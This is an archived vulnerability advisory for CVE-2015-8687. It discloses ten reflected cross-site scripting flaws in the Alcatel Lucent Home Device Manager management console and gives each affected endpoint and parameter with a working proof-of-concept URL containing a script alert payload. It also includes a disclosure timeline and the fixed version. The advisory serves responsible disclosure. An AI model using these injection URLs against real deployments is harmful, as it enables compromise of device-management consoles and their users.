what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Alcatel Lucent Home Device Manager Cross Site Scripting

Alcatel Lucent Home Device Manager Cross Site Scripting
Posted Jan 5, 2016
Authored by Ugur Cihan KOC

The Alcatel Lucent Home Device Manager management console suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2015-8687
SHA-256 | 6ca37aa2b741d2a932bf88aeb2a7c29e34b2f41d21497e9dcccf69519f7dc7f9

Alcatel Lucent Home Device Manager Cross Site Scripting

Change Mirror Download
Document Title:
===============
Alcatel Lucent Home Device Manager - Management Console Multiple XSS

CVE-Number:
===========
CVE-2015-8687

Release Date:
=============
03 Jan 2016

Abstract Advisory Information:
=============================
Ugur Cihan Koc discovered ten Reflected XSS
vulnerabilities Alcatel Lucent Home Device Manager - Management Console

Vulnerability Disclosure Timeline:
==================================
10 Dec 2015 Bug reported to the vendor.
10 Dec 2015 Vendor returned ; investigating
16 Dec 2015 Vendor has validated the issues & fixed
27 Dec 2015 CVE number assigned
03 Jan 2016 Disclosured

Affected Product(s):
====================
Alcatel Lucent Home Device Manager - Management Console 4.1.10.5
may be old version could be affected

Exploitation Technique:
=======================
Local, Authenticated

Severity Level:
===============
High

Technical Details & Description:
================================
Ø Sample Payload : 42f8b36<script>alert(1)<%2fscript>152b4

Ø Affected Path/Parameter: [10 parameter]

1. /hdm/DeviceType/getDeviceType.do [deviceTypeID parameter]
o
http://10.240.71.198:7003/hdm/DeviceType/getDeviceType.do?deviceTypeID=42f8b36
<script>alert(1)<%2fscript>152b4

2. /hdm/PolicyAction/findPolicyActions.do [policyActionClass parameter]
o
http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=&policyActionClass=c9e31
"><script>alert(1)<%2fscript>3bd174ff207&policyActionFunction=0

3. /hdm/PolicyAction/findPolicyActions.do [policyActionName parameter]
o
http://10.240.71.198:7003/hdm/PolicyAction/findPolicyActions.do?policyActionSearch=1&policyActionName=553a3
"><script>alert(1)<%2fscript>721d335792b&policyActionClass=&policyActionFunction=0

4. /hdm/SingleDeviceMgmt/getDevice.do [deviceID parameter]
o
http://10.240.71.198:7003/hdm/SingleDeviceMgmt/getDevice.do?deviceID=8001a1a0b
<script>alert(1)<%2fscript>1a032

5. /hdm/ajax.do [operation parameter]
o http://10.240.71.198:7003/hdm/ajax.do?operation=getDeviceById0fa81
<script>alert(1)<%2fscript>238957ca4e0&deviceId=8001

6. /hdm/device/editDevice.do [deviceID parameter]
o http://10.240.71.198:7003/hdm/device/editDevice.do?deviceID=8001c94e5
<script>alert(1)<%2fscript>45f4a

7. /hdm/policy/findPolicies.do [policyAction parameter]
o
http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=19f01
"><script>alert(1)<%2fscript>b37ee8333eb&policyClass=&policyStatus=&trigger=trigger_all

8. /hdm/policy/findPolicies.do [policyClass parameter]
o
http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=&policyAction=&policyClass=c77cb
"><script>alert(1)<%2fscript>5ddc63ced2e&policyStatus=&trigger=trigger_all

9. /hdm/policy/findPolicies.do [policyName parameter]
o
http://10.240.71.198:7003/hdm/policy/findPolicies.do?policySearch=1&policyName=654dd
"><script>alert(1)<%2fscript>5b8329ee237&policyAction=&policyClass=&policyStatus=&trigger=trigger_all

10. /hdm/xmlHttp.do [operation parameter]
o
http://10.240.71.198:7003/hdm/xmlHttp.do?operation=getQueuedActionsd4b0c
<script>alert(1)<%2fscript>217f045ae1f&deviceID=8001



Proof of Concept (PoC):
=======================
POC Video;
https://drive.google.com/file/d/0B-LWHbwdK3P9Y3UyZnFmZjJqa1U/view?usp=sharing

Solution Fix & Patch:
====================
Fixed version of 4.2

Security Risk:
==============
The risk of the vulnerability above estimated as high.

Credits & Authors:
==================
Ugur Cihan Koc(@_uceka_)
Blog: www.uceka.com


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close